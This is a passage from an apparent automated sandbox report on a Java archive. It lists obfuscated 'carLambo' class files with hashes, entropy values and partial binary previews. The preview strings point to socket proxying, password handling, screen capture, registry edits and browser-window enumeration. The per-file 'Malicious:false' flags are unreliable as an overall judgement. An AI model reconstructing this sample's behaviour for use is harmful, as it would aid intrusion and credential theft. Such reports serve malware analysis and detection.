                        SHA-512:AA891B87C4B8618F5AE575A9068047571F3F44BE4376E5D6072EAE0E9DAFAD828F8CCF0DB8B526CF874E886B5406B6FC8F4A138C0E1A12362218478E08ADB385
                        Malicious:false
                        Preview:.......4.Q..+..=..@..A..B..C..G..H..I..J..K..L....#....'...."....#....&....!....*.........$....).............. ....(.........%..7....7.4..7.5..?.3..D.2..D.:..D.<..E./..F.,..M.9..M.;..N.-..O.0..P.6..........()Ljava/io/OutputStream;...()Ljava/lang/String;...()V...()[B...(I)Ljava/lang/String;..,(LcarLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD;)V..](LcarLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD;Ljava/net/Socket;LcarLambo/iWGSWxRnUlPNEVGNllqlF;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V...(Ljava/lang/String;I)V...([B)V...<init>...Code...I..)LcarLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD;..#LcarLambo/gjWVByXBXFzoJIWyWKFqdDDX;...Ljava/lang/String;...RProx:...StackMapTable...append..'carLambo/AILeJFODIHNyHULMHPDMqXVIZVnaVD..!carLambo/gjWVByXBXFzoJIWyWKFqdDDX...carLambo/iWGSWxRnUlPNEVGNllqlF...carLambo/rCYbIngZMxCXvVYABulZ...gQEuyVcYntwPXTysEtfquh...getBytes...getOutputStream...java/io/OutputStream...java/lang/Exception...java/lang/Object...java/lang/String...java/lang/StringBuilde

                        C:\jar\carLambo\hSQNXYaWyFQzecPOHvVddvqXyqC.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):7834
                        Entropy (8bit):6.093106794907294
                        Encrypted:false
                        SSDEEP:192:W4HyBSJO8YrG1HF2AmfL786W8UWitZqg2nYmf/:W4HyBSJjYrwHF2AmfX86WXWyL2Ymf/
                        MD5:E01DC22C7A67D442AD9259AB660F3A52
                        SHA1:14E6710A58122A455D236ECDF5796BE1BA5A4CC0
                        SHA-256:216EB9019601B83042640ABE2B2F8CC6899FCCA3C60216592F2810EF158AAFDB
                        SHA-512:A757672362EC616646EAA30ACF20D2D53B1F983BB874183FCAE327C8C0D83FC3CEDEBCB28BA9CFCB9A896B80253C05B71355748C146AEF095B5146143AE8EA04
                        Malicious:false
                        Preview:.......4.y........................................................................... ..!.."..$..+..,.....@..X..Y..\..^..f..h..i..j..k..s..t..v..w..x...........%..&..'..(..)..A..B..C..D..E..F..G..H..I..J..K..L..M..N..O..P..Q..R..S..T..U..V..W..3....3....3....3....4....4....7....K....1....2....3....3....3....3....3....3....5....6....6....7....7....7....7....7....7....7....8....9....:....;....;....;....<....=....=....=....=....>....?....@....A....B....C....C....C....D....D....E....E....E....E....E....E....E....E....E....E....E....E....F....F....F....F....F....G....H....H....J....J....L....L......................................................#....#....*....-........./....0....1....2....3....4....4....4....4....4....4....4....4....5....6....7....8....9....:....;....<....=....>....?....Z....[....]...._...._...._....`....a....b....b....c....c....d....e....g....l....m....m....n....o....p....q....r....u....u.................... /v "..."..." ..." /f...()I...()Ljava/io/InputStream;...()Ljava/i

                        C:\jar\carLambo\iWGSWxRnUlPNEVGNllqlF.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):121
                        Entropy (8bit):5.165193171690061
                        Encrypted:false
                        SSDEEP:3:DbllEFlY8NV3phHXy1L82EwYp3gQl9xUDJC1qQCK8P5GxgGn:8rZho6QQnxaJ2qRP5VG
                        MD5:4CF8C304A115C5507A9B0B3B4E92523D
                        SHA1:E6E76863825C3A0ACEA1F2492D15F4AF052C2A06
                        SHA-256:088813568A00014FD0A9651842BD5629E0B77BC6FAFF06E2D6E2317B9A605C04
                        SHA-512:4606F28D1999C55B4FC782EAF614F0991A9C5B70228CE5A93E65BDB14B6C9EC538AFAB3C0940F3D738F1E72F2890F1125B14C07C4BF77060FDC3A9ED0A41A837
                        Malicious:false
                        Preview:.......4...........()V...carLambo/iWGSWxRnUlPNEVGNllqlF...gQEuyVcYntwPXTysEtfquh...java/lang/Object......................

                        C:\jar\carLambo\iytiDwrcScnkWxsldKZwufPjSLiFk.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):8141
                        Entropy (8bit):6.140925625237153
                        Encrypted:false
                        SSDEEP:96:Hh0phe90x1WejLUAZNQ5GR9qmTkk2lZu5N0sd+dE8ez845U15fYKgy4a8uFOHRpS:Hh0b3XTDa2N0Ui/ezWfiba1UxpS
                        MD5:55239751E43F849EA8BF05FFC03B963F
                        SHA1:E3058AE0E63561A03149002602AE969434A087CE
                        SHA-256:E78AA7F38A8720EB99D8A529A0C63809D9F5FBBE4323ADD402D21768D8CFC7C4
                        SHA-512:223C9D02DA40E88E6C0BDE1DEA57605D6119FC66334BF76CF8FF51E55C32C1F79A9E6ADB373F01C06B7172043B52284C5DC9E70800747360D0C538ED089206F1
                        Malicious:false
                        Preview:.......4...................................... ..!.."..#..%..'..)..*..-..2..3..5..7..8..9..=..>..?..@..A..B..C..F..G..R..S..T..W..X..m..n..p..q...................................:..<..H..I..J..K..L..M..N..O..P..r..s..t..u..v..w..x..y..z..{..|..}..~......................................@....@....A....C....Q....9....9....:....;....;....<....<....=....=....=....>....?....?....?....B....B....B....C....C....C....C....C....C....D....E....E....F....G....G....G....H....I....J....K....L....M....M....M....N....N....O....O....O....O....O....O....O....O....O....O....O....O....P....P....P....P....Q....Q....Q....R....S....S....S....S....S....S....S....T....T....T....T....U....U....W....V....V....$....$....$....$....$....$....$....+....E....Q....U....V....Y....Z....[....\....]....^...._....`....a....a....a....a....a....a....a.;..b....c....d....e....f....g....h....i....j....k....l....o............................................../............................................0..........................

                        C:\jar\carLambo\lUtzYRoVxoBKRpnyWYynzJxpJ.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):284
                        Entropy (8bit):5.226148508530949
                        Encrypted:false
                        SSDEEP:6:kkPKd0hSW4y1Hq7vsxY7vmJ8LnxaJ2qRPt+NulI0OloF/llplll:lCNy1HOvQY7+JUnxaJtRlnlINlo9/L/
                        MD5:E4998F00064F1CAA3425FE0CED3EDF73
                        SHA1:1DDA65487E72427F3D7FD930E097C889250A21BE
                        SHA-256:4D4BE6ABED1F8B032BE853BB379475CED451F8A1C2612874D23B6865CE8FCFC6
                        SHA-512:760F667D733EBD2F4C5345D4879C8160C570E6D86242BD33868853F46DE5F70F1D01F4428BDD7C403A2288926E20D4E435C5715249A259446F77C69A2803AF2D
                        Malicious:false
                        Preview:.......4.....................................()V...<init>...Code.. carLambo/ISyzDWggemUZimyTYMwRRfQ.."carLambo/lUtzYRoVxoBKRpnyWYynzJxpJ...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..................................*........................................

                        C:\jar\carLambo\lXFRxTmUHAVtXyFTZbpbiXx.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):6205
                        Entropy (8bit):6.0261454669599015
                        Encrypted:false
                        SSDEEP:48:Ve9KPRr6LURBipyCI4dhtkyEARQphs0U6Mvgr7qQlaZ7lxKqz5DV00sMlyZW/3u0:k9oRYI2DEAugmaZmwog+gXalxg3j8aV
                        MD5:688C0B9E0E86508E0E4D2419D7FB010E
                        SHA1:C6C9A27CCE94B2F11B5D92117175307BFD35FF68
                        SHA-256:F9D63AF93D7DAE4A2EDA2BD6FEBDCE384E8C0820B2D2EB9AC2A153F2B2324206
                        SHA-512:58E2A79939D7F7F61E54117A97B1F2E7F3395DEE63D7609398D9EBEA2410014DF5954C63640D0ED8BC2E0A96626B924D85E7784221056B26ECAA2B0B3C07902C
                        Malicious:false
                        Preview:.......4.Q.>....................3..4..5..6..7..8..9...................................... ..!.."..#..$..%..&..'..(..)..*..+..,..-...../..0..1..2...................?.ffffff.....................................%................|.................................................}.............................|...................~........................|.............................|.. ....!....".|..#....#....#....#....#....#....#....#....$.|..$....$....&....&....&....'....'....'....)....*....*....+....+....,....,....,....,....(....(............................................................................................................................................................................................................:....;....<....=....>....?....?....@....A....B....C....C....D....E....F....G....H....I....J....K....L....M....N....O....P....P..........()I...()Ljava/awt/Dimension;...()Ljava/awt/Graphics2D;...()Ljava/awt/Toolkit;.. ()Ljava/awt/image/BufferedImage;...()Ljava/io/

                        C:\jar\carLambo\mHewsQjItURiLCXNkzji.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):445
                        Entropy (8bit):5.546655524612381
                        Encrypted:false
                        SSDEEP:12:c/mqtMjQKjzy1nojG1nxaJtRVwOmqI+ykA:omRtPy1noCxQHPw/5kA
                        MD5:7C064E0604033C54B60BB36751A4F815
                        SHA1:441326BF5DE070A678526F1FA2CAC59EE727876F
                        SHA-256:9C4C46067FF01C19019981A8F2C268D46622B9FB3B934D2C06B14C36F629BAD8
                        SHA-512:636017163C0C7084759EBDDCF1D235283020954A66585595165640ABBE2E99676BF0FA4AF4608D8F279AE4396EBD05C95F17F2D7EA551F564E14EBE57FE41649
                        Malicious:false
                        Preview:.......4.........................................()V..$(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;)V..%(LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;B)V...<init>...Code...I..!LcarLambo/CHHXGzeSpzwiJOAtZoSZBJ;...Ljava/io/InputStream;...carLambo/mHewsQjItURiLCXNkzji...gQEuyVcYntwPXTysEtfquh...java/lang/Object...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ.0........................................................*+...*..............................*+..........

                        C:\jar\carLambo\nPpeMSRGcCgSgfpfzdBoEfHy.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):651
                        Entropy (8bit):5.556061557366131
                        Encrypted:false
                        SSDEEP:12:QuktM6mMOagMBMcGsMkhy18rkMvnoznxaJVRF7MsqMXlomMDbFWxUDHlMBl:QTM6dMGy18r5wrQzz5wb4xuMT
                        MD5:3953348AC83DAEF9490DDA4344020076
                        SHA1:0E33CE888DA1231E8820F0042F98377F38998196
                        SHA-256:743B7A248C9572322742DB6CD99BA67066306B9A1A8CE4B423F51C0A6D577550
                        SHA-512:D0446B04BF35188CD4FFE7D66104AEC9B224F2DB1ACF3844CE31F28DE500C5C2A0E7CAE9487D3B70A2FC664D368B21B0CD7605541E2BF2FDBC204E822705190A
                        Malicious:false
                        Preview:.......4.+.. .."..%..&..'..(....................................................!....#....$....)....*.....()Ljava/lang/String;...()V...(Ljava/io/InputStream;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...([BII)I...([BII)V...<init>...Code...Ljava/io/InputStream;...StackMapTable...[B...append..!carLambo/nPpeMSRGcCgSgfpfzdBoEfHy...close...gQEuyVcYntwPXTysEtfquh...java/io/InputStream...java/lang/Object...java/lang/String...java/lang/StringBuilder...read...toString.1...........$............................*...*+...........$.........m.......@.....L...Y...M*...+.+....Y>....*.........,...Y+........W...,...........................................

                        C:\jar\carLambo\niHBeoQPoWsSpEBovnMizhbIfpQUU.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):395
                        Entropy (8bit):5.441731912204154
                        Encrypted:false
                        SSDEEP:6:Fb+s3jsURY94y1rRYLRYxpT/VVnxaJ2qRPt+NulkXi8BPmlknM50:FbxR1y1rRMROpVVnxaJtRlnlsLqkM50
                        MD5:FBD00923D65394922C4E189A4D23D6C6
                        SHA1:8D8FA2BBF47B24EFB55E504B8FE6E25ACE44EBDE
                        SHA-256:5AFDFF4A9129C84A7AA09616BCC0F8CF09D265A26833E4EA8C45FBCC27DD0640
                        SHA-512:3C2E9458ECA59358F99DD5776B109034DAAE4C20D8D0B7315ED76CFADD45806CA0FC1DA0E2A399CFA1CFE1DC8C0A874D0D9E3D8D55F21A9D184F409BD9C791EB
                        Malicious:false
                        Preview:.......4...............................................()V..&(LcarLambo/GeLuFwhdbiiEVoEeoUbtXxPX;)V...<init>...Code..#LcarLambo/GeLuFwhdbiiEVoEeoUbtXxPX;..!carLambo/GeLuFwhdbiiEVoEeoUbtXxPX..&carLambo/niHBeoQPoWsSpEBovnMizhbIfpQUU...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Runnable...run.0..........................................*+...*..............................*.............

                        C:\jar\carLambo\nnHRYoAONroTDXAkGOnAtRE.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):4556
                        Entropy (8bit):6.057717063212165
                        Encrypted:false
                        SSDEEP:96:g4OokMEnjUySaTiOVB/MWmDjUf4SI6OKJ42sIGaQfT:d3kMEdVTiOV9Eiu2J3ET
                        MD5:B49D49728DBAE4901BB5B8BB81014C28
                        SHA1:31BF7D0A02708E557E01D429217D12CB7615C58F
                        SHA-256:BAB5692C03D65905D43785B4FABFDD39F46A93825C02914D8AB363BFC5D9CC89
                        SHA-512:F6FACB18F227B070478E1315474C0074AE5740D9CC1BC650126F12EE5683045CF60C896B4A24AA7EF449568DF097B9D1CCAC54CBC51252DDADA5CF62F5E5F9E5
                        Malicious:false
                        Preview:.......4...............................................................................................................}....i....j....k....}..................................~....}....z....{....|..............r....e....s..............d.........x.........b....f....h....p....u....y....b....e....l....m.............................w.........o....... .t.. .... .... ....!.c..".g..#......n....q.........n...................n....v..............................................................................................................................................................................................................................................................................................()I...()J...()Ljava/lang/String;...()Ljava/sql/Statement;...()V...()Z...()[B...(C)Ljava/lang/StringBuilder;...(I)Ljava/lang/String;..B(ILjava/security/Key;Ljava/security/spec/AlgorithmParameterSpec;)V...(I[B)V...(Ljava/io/File;)V...(Ljava/io/File;Ljava/io/File;)V..3(Ljava/lang/CharSequenc

                        C:\jar\carLambo\nnHRYoAONroTDXAkGOnAtREs.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):4867
                        Entropy (8bit):5.845168958385616
                        Encrypted:false
                        SSDEEP:96:/tW6bbP9ZiVeROwAN5qk4zak0QxDg2YfbppMXTlZNwBZ:/oqrJRORqZDM2YDppYzNwBZ
                        MD5:A7610A543F361780AB282AE8DAFF38BF
                        SHA1:416D6F8BC9EF6926A3DC1F57938F45FE20DF4EEC
                        SHA-256:4F2FF7B535333C62AFFFB3D656ABD6225C247AFE01AFF6D7B786A73F965EF4A6
                        SHA-512:DB618E167CAF9D5075C3F42FCFED47F4F8560F483FAFE2512AD6BE780DD2E372250E1F2EB07E7D437B8F1DB36D1ACC652213FF58C258DFE61EDFD1AC51098F7B
                        Malicious:false
                        Preview:.......4.........X..Y..Z..[..\..w..x..z..{..|..}..~..........................................................G....?....H....I....K....M....N....>....R....O....P....=....@....E....F....J....L....S....T....U....V....=....?....B....C....W....A....D....Q..v.`..v.j..v.p..v.u....f....e....o....b....k....m....i...._...._....n....a....]....^....c....n....r....t....s....l....q....d....g...._...................Password: ..."...()I...()J...()Ljava/lang/String;...()V...()Z...()[B...()[Ljava/io/File;...(I)Ljava/lang/String;...(I)Ljava/lang/StringBuilder;...(I)Ljava/nio/ByteBuffer;...(II)Ljava/lang/String;..'(ILjava/lang/String;)Ljava/lang/String;..:(ILjava/lang/String;Ljava/lang/String;I)Ljava/lang/String;...(Ljava/io/File;)V...(Ljava/lang/CharSequence;)Z..D(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;...(Ljava/lang/Object;)Z...(Ljava/lang/String;)I..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V..'(Ljava/lang/String;)[Ljava/lang/String;...(Ljava/lang/

                        C:\jar\carLambo\oarPtnuBJYDryklAVpYvVplj.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1158
                        Entropy (8bit):5.896238701318844
                        Encrypted:false
                        SSDEEP:24:RK6ERAd4CvWL9aCvW63y1f9LCvWF1SLj4exACvWxCvWmQCz5UEN5Vxk9c/:KNCvg9aCvxyCvQ1Sj9xACvgCvWmQCz5Z
                        MD5:59FFCC9CD906BFBEBD1F0DCC5648E96F
                        SHA1:5E012AE14E926FC4FF9F31FAA8179CCAF14DC87D
                        SHA-256:7C0CE7FF9266E6039D13003C0E743D03716666D2F4B54346C8777C3BD00BC5C2
                        SHA-512:CB02B8C7A7F2E9635751C6A0002CC64529F50F1222C1984274E92B39A1D091F112844D6B7DDF59C63462F9220CD17056305139AB624160EC792B7F1098B6A7F7
                        Malicious:false
                        Preview:.......4.=...../..0..1..2..3..4..8..9....................................................%....5.#..6."..6.'..6.(..7....:.*..:.+..;.)..<.$...()V...()Z..;(LcarLambo/pOkXJMhVItPChYeMRCPBQRAUzLx;Ljava/lang/String;)V..@(Lcom/sun/jna/platform/win32/WinDef$HWND;Lcom/sun/jna/Pointer;)Z...(Lcom/sun/jna/platform/win32/WinDef$HWND;[BI)I...(Ljava/lang/CharSequence;)Z...([B)Ljava/lang/String;...<init>...Code...I...LcarLambo/HBrowserNativeApis;..&LcarLambo/pOkXJMhVItPChYeMRCPBQRAUzLx;..(Lcom/sun/jna/platform/win32/WinDef$HWND;...Ljava/lang/String;...StackMapTable...callback...carLambo/HBrowserNativeApis..!carLambo/oarPtnuBJYDryklAVpYvVplj..$carLambo/pOkXJMhVItPChYeMRCPBQRAUzLx...com/sun/jna/Native...com/sun/jna/Pointer..&com/sun/jna/platform/win32/WinDef$HWND...com/sun/jna/platform/win32/WinUser$WNDENUMPROC...contains...gQEuyVcYntwPXTysEtfquh...isEmpty...java/lang/Object...java/lang/String...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ...toString.0.............6.'.....:.+.....;.).......%. ...&.

                        C:\jar\carLambo\pOkXJMhVItPChYeMRCPBQRAUzLx.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):14656
                        Entropy (8bit):6.307093846144187
                        Encrypted:false
                        SSDEEP:384:yaPdSwHTr5Dbw8+zNbNoBtVhtKexwzJ+zNbNoBMv:y2cwHTNDkrNbNoBT/LHNbNoBY
                        MD5:4C47D6B8B9B9251F57686B0288509A82
                        SHA1:207CCB258ED2ED73CA81A63E5FA9DC34CCD69D0A
                        SHA-256:52B7BE8E98604F03EFC820E7EC77FF16011568F986C45371022862AFF4CA0F46
                        SHA-512:03C0629A53D1FC464F7C899253156FDF4FF81F922199D8864CC3D30DBCCCDC365AE348B10D9084D260262F7F5F8EC570BE458BCAA357EA6297DACD06C307E021
                        Malicious:false
                        Preview:.......4.3................@.....P..Q..R..S..T................................................................................!..%..&..(......................................................................................................................................................................?.ffffff.@ 333333..................................(....,..../....2....:../..../....6....6.-..6.<..6.H..8....9....9....9....9....9....9....<.N..<.O..=.)..=.K..O.3..S....*....*....*....*....*....*....*....*....*....*....*....*....*....*....*....*....*.0..*.1..+....,....-.........................................'....+....7....8....9..0....1....1....4....5....6....7....8....;....;.&..<....=....>....>.%..?....?.=..@....@.E..A....A....C.;..D....D.M..E.6..F."..G.4..H....H.!..I.5..K....L....L.@..M....M....M....M....M.*..M.?..M.B..M.C..M.D..M.F..M.I..M.J..N....N....N....N....N.G..P....P.>..P.A..Q....R....R....R....R....R.#..R.$..T. ..T....U.L...._....i....j....l....n....o....p......................

                        C:\jar\carLambo\pXEQYpIAvPbarbDZMRoR.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):500
                        Entropy (8bit):5.517542984835602
                        Encrypted:false
                        SSDEEP:12:airyKhy1CFYJLhZQnxaJtRF+KBtYkloFdMglZjKLLjRL7:aiXhy1QYJLhcQHzTLTi17ELFL7
                        MD5:A75CA155222D6842941EA36F3D7204A3
                        SHA1:78700C9DCC3891739815FD1F8BB33D0C69A90158
                        SHA-256:262F9E27965D45FDD1EDA1FF53C104945C5600CEA4DD83C96D508E7FA74499FC
                        SHA-512:C0465FA5020B3FFBF924DBED1830B72646002D24CE7F660700D0D8DA0F20F5B9E6A88304B3B2D94E5D429C4DB692AAEB0073DD2AA4E84A5F1D11700656585AB4
                        Malicious:false
                        Preview:.......4.............................................................................()V...(Ljava/lang/Runnable;)V..%(Ljava/net/Socket;Ljava/net/Socket;)V...<init>...Code...Ljava/net/Socket;...carLambo/YlqtqHSDDFgBzCqfJBUfI...carLambo/pXEQYpIAvPbarbDZMRoR...gQEuyVcYntwPXTysEtfquh...java/lang/Object...java/lang/Thread...nnHRYoAONroTDXAkGOnAtRE...start.1................................................*.....................I.......=*+...*,......Y...Y*...*...............Y...Y*...*...................

                        C:\jar\carLambo\pjLIIQVgvuPOInKOREwLQrvvgxeCAr.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1676
                        Entropy (8bit):5.735242258674326
                        Encrypted:false
                        SSDEEP:48:7fB1oTTfEJcRh6VHqdQE/z5ku9ehIBRJ8FhI0I9HOQC:7ff6jqhwehI/PC
                        MD5:8C607C3CAA15C88543DB425FE44BDE81
                        SHA1:FD6774C03ED934612D6EF3B1514D3C503249FF04
                        SHA-256:3DD16BEAC17A5E424C5B69044E411DC02EE8734A02F1115B67E6B455374E8742
                        SHA-512:926E76612FB06B31F558488B785682A3046EBBA1B095A63966FE52ABEB8B0DFD8DF81A8489384C9E251E6AD7C691B90DE15A5DD5FCAD1139A441D3464CDC1E68
                        Malicious:false
                        Preview:.......4.d..A..D..P..T..U..V..W..X..Y..Z..[....'....)....+....,..../....(...."....#....$....!....!....&....-....1....2....%....*....3....!....0.......C.6..C.9..C.:..C.;..C.>..C.@..G.J..K.I..N.M..O.=..R.M..S.H..\.4..].8..^.H..`.<..a.7..b.?..c.5...()I...()Ljava/lang/String;...()V...()[C...(I)I...(I)V.. (ILjava/security/SecureRandom;)V..((ILjava/util/Random;Ljava/lang/String;)V..&(Ljava/lang/Object;)Ljava/lang/Object;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V..&(Ljava/util/Locale;)Ljava/lang/String;...([C)V...0123456789...<clinit>...<init>...ABCDEFGHIJKLMNOPQRSTUVWXYZ...Code...ConstantValue...GYDTPVEwzYqRTvxmvHtRLJG...Ljava/lang/String;...Ljava/util/Locale;...Ljava/util/Random;...ROOT...StackMapTable...[C...akllnBiTjwPmAwfMbajsTFm...append..'carLambo/pjLIIQVgvuPOInKOREwLQrvvgxeCAr...gQEuyVcYntwPXTysEtfquh...gcLmiwpDoXkEofFgIgnkAFbECjBM...ghKDbwZCNsgFCyEcTHODu.."java/lang/IllegalArgumentException...java/lang/Object...java/lang/String...java/lang/StringBuilder.

                        C:\jar\carLambo\qQnenommQRmzAInlnTAeg.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):531
                        Entropy (8bit):5.475737054020017
                        Encrypted:false
                        SSDEEP:12:Ltl4BznMAZy1FPHTCZnxaJLCgmrhOzXbSUNhGKFSi7cdtUc7MmXS2/:LtGB/y19HTCNQTku2cRXUtUoMmXSm
                        MD5:B090088EAB134039A96C6073B52654B7
                        SHA1:028929F36DC8A71FFB2995ACF36004B09A6CBD42
                        SHA-256:D2BE43B8D7B7EF1884B6B2778CB0C8226B138EBFC0BBD9E4A966EE1170180793
                        SHA-512:C87D0B557A5A2BC5F087A562BE751C0DE4E311E0D8412C1194434B11E8569DABCA21F3C12A755977DB04A055A675A2C75DA0065678498769E4BDC279DD7E1919
                        Malicious:false
                        Preview:.......4.!........................................................................()Ljava/lang/Object;...()V...()[I...(Ljava/lang/String;I)V...<clinit>...<init>...Code...I...[I...carLambo/qQnenommQRmzAInlnTAeg...clone...gQEuyVcYntwPXTysEtfquh...ghKDbwZCNsgFCyEcTHODu...java/lang/Enum...nnHRYoAONroTDXAkGOnAtRE...qvNsplybcQmnatGjnQTThBZ...values$258dc6c5.0............................................. ......................................................*+......................1.......%...............Y....OY....OY....O..........

                        C:\jar\carLambo\qvNsplybcQmnatGjnQTThBZ.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):2302
                        Entropy (8bit):5.832304833865136
                        Encrypted:false
                        SSDEEP:48:EDNIWoHhxnOahCOC4pYBSuvQ2Wmz5DV3rilK49TlSpup0u5woeb5B+6X+0Fbnj:KI7HDjQSIpbinScmoe9cto
                        MD5:7B5452BF6258BE8D66C9A0DB5B55D64B
                        SHA1:2B4088F7104D1853777A266CE5CB2252537E4E0D
                        SHA-256:47D1007C91E0BE64C2B77ABDA069B3372CB23F04E16D9CAECD44B3BAB8E25AC3
                        SHA-512:B34174E2D0A4764DE7F4623F2A76022128CE51E435112C9E212AAAEBBD08113D769B6C5C3711BFADD19C0DE027A88F3F3D6A53E4AAB8D3336BCC3E5E7B00A2AB
                        Malicious:false
                        Preview:.......4.w..R..T..V..\..W..Y..Z..`..a..b..c..d..e..f..g..h..i..j..k..l....8.........5..../....3....:....1....4....;....1....3....?....9....-....-....1....2....>....0....=....1....7....6....<..P.C..P.F..P.H..P.I..P.K..X.J..[.C..].D..^.L.._.@..n.B..o.S..p.K..q.M..r.G..s.L..t.C..u.A..v.N...()Ljava/io/InputStream;...()Ljava/lang/String;...()Ljava/net/URLConnection;...()V...()Z..I(LcarLambo/qvNsplybcQmnatGjnQTThBZ;Ljava/lang/String;Ljava/lang/String;)V..8(LcarLambo/qvNsplybcQmnatGjnQTThBZ;[Ljava/lang/String;)V...(Ljava/io/File;)Z...(Ljava/io/InputStream;)V...(Ljava/lang/Runnable;)V..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(Ljava/lang/String;)V..'(Ljava/lang/String;Ljava/lang/String;)V...([BII)I...([BII)V...([Ljava/lang/String;)V...<init>...Code...EXCEPTION: ...Ljava/io/PrintStream;..NMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0...StackMapTable...User-Agent...[B...append...carLambo/ghKDbwZCNsgFCyEcTHODu.. carLambo/qvNsplybcQmnatGjnQTThBZ...close...d

                        C:\jar\carLambo\rCYbIngZMxCXvVYABulZ.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):1695
                        Entropy (8bit):5.848532205389725
                        Encrypted:false
                        SSDEEP:48:nL+rsw6cgIMph9y87TIQIf6gjFfE9DfOK:nLubtgaoTIhrJfyDfh
                        MD5:EC45BD87F8DA13CD0D8329BDA04FA591
                        SHA1:71EE4CBFA4071A4EAA7A12568F476AB25AA00000
                        SHA-256:A791B9B5C5E0779C0999CCF89DD5BB7D37EC5975B8C98F875304D1C6A7288D8A
                        SHA-512:4D197D810834A94414CB0867367E901F17E79F80A98386BC0E3897570A041E5C6551B94C9594495D7725AAF4A1C831175C01DCE71A65A2833BDADBA9174DFB52
                        Malicious:false
                        Preview:.......4.g..6..;..?..@..c..f..R..S..T..X..Y..Z....*....2....#....$....%....&....'....(....+....,....-........./....1....3....4....0...."...."....)....5..=.8..A.I..C.I..D.I..L.I..M.O..P.E..Q.:..U.E..U.I..V.I..W.E..[.I..\.I..].9..].E..a.E..a.I..b.I..d.7......()Ljava/lang/String;...()V...(I)Ljava/lang/String;..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...127.0.0.1...<clinit>...<init>...AimdQBqtwmRlTmfOwmvjwNywPJZsM...C:\Program Files...C:\Program Files (x86)...CHHXGzeSpzwiJOAtZoSZBJ...Code...GYDTPVEwzYqRTvxmvHtRLJG...GeLuFwhdbiiEVoEeoUbtXxPX...I..&LcarLambo/VRdaqkGKmButMUdsZLfSOLnpgVk;...Ljava/io/InputStream;...Ljava/io/OutputStream;...Ljava/lang/String;...Ljava/net/Socket;...Ljava/util/Random;...OeziLNfIzXyeUUtuiOSPKlGvibRk...QsNkSlGCqFomtjHlHdgKKJlOETn...TQaTMIBufeXwulTTDuvpxBTBfNW...Z...akllnBiTjwPmAwfMbajsTFm...append..&carLambo/iytiDwrcScnkWxsldKZwufPjSLiFk...carLambo/qQnenommQRmzAInlnTAeg...carLambo/rCYbIngZMxCXvVYABulZ...gQEuyVcYntwPXTysEtfquh...gcLmiwpDoXkEofFgIgnkAFbECjBM...g

                        C:\jar\carLambo\rEgmEOZGPmyKjwgxifrjbDi.class

                        Download File
                        Process:C:\Windows\System32\7za.exe
                        File Type:compiled Java class data, version 52.0 (Java 1.8)
                        Category:dropped
                        Size (bytes):395
                        Entropy (8bit):5.433105859277028
                        Encrypted:false
                        SSDEEP:12:Fbe/ey1+/t2nIiTb/eLnxaJtRl9/LqkM50:FbeGy1+WIiTbWTQHz9bM50
                        MD5:2472140BE900D15A86B7F0C55AB4CCC0
                        SHA1:9C164354ACB06CFECD1EE853D8500FFEBEB55AF9
